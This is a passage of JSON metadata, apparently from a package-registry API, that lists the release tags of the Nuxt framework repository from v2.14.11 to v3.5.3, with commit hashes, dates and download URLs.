/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/ma